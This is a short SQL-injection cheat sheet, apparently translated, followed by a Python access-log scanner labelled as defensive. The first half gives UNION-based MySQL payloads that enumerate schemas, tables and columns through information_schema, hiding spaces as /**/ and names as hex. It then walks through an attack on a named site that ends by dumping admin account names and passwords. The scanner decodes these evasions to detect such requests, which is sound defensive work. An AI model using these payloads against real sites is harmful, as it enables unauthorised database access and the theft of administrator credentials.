Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<database name as hex>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<table name as hex>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables through information_schema

Example:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping the limit offset this way, the 4th entry turned out to be the admin_user table.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
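As an added, defender-side example (not part of the original post): a small Python log scanner that undoes the two evasions the requests above rely on, `/**/` in place of spaces and 0x-encoded schema/table names, and flags query parameters that read information_schema. The log lines are constructed for the example; the request path is the one from the post, the client addresses and timestamps are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from the post); line 2 carries the post's step-2 request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ccaus_content.php?ccausid=13240 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /ccaus_content.php?ccausid=13240'
    '/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS'
    '/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574'
    '/**/limit/**/0,1/* HTTP/1.1" 200 4120',
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)")

def normalize(value: str) -> str:
    """Undo the spacing trick: MySQL reads /**/ as whitespace, so the detector does too."""
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()
def decode_hex_literals(value: str) -> list:
    """ASCII-decode each 0x... literal; the post hides schema and table names this way."""
    names = []
    for h in HEX_LITERAL.findall(value.lower()):
        try:
            s = bytes.fromhex(h).decode("ascii")
        except ValueError:  # odd length, or bytes that are not ASCII
            continue
        if s.isprintable():
            names.append(s)
    return names
def analyze_param(name: str, raw: str) -> dict:
    """Score one query-string value; raw is the already URL-decoded value."""
    q = normalize(raw)
    f = {
        "param": name,
        "union_select": re.search(r"\bunion select\b", q) is not None,
        "information_schema": "information_schema." in q,
        "comment_terminator": raw.rstrip().endswith(("/*", "--", "#")),
        "decoded_hex": decode_hex_literals(q),
    }
    f["suspicious"] = f["union_select"] or f["information_schema"]
    return f
def scan_log(lines) -> list:
    """Findings for every query parameter that looks like schema enumeration."""
    hits = []
    for m in filter(None, map(REQUEST.search, lines)):
        for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            f = analyze_param(name, raw)
            if f["suspicious"]:
                hits.append(f)
    return hits
```

Matching on the normalized value is what makes the check robust: a rule that looks for `union select` with a literal space never sees the `/**/` variant, and decoding the hex literals tells the analyst which schema and table were being enumerated.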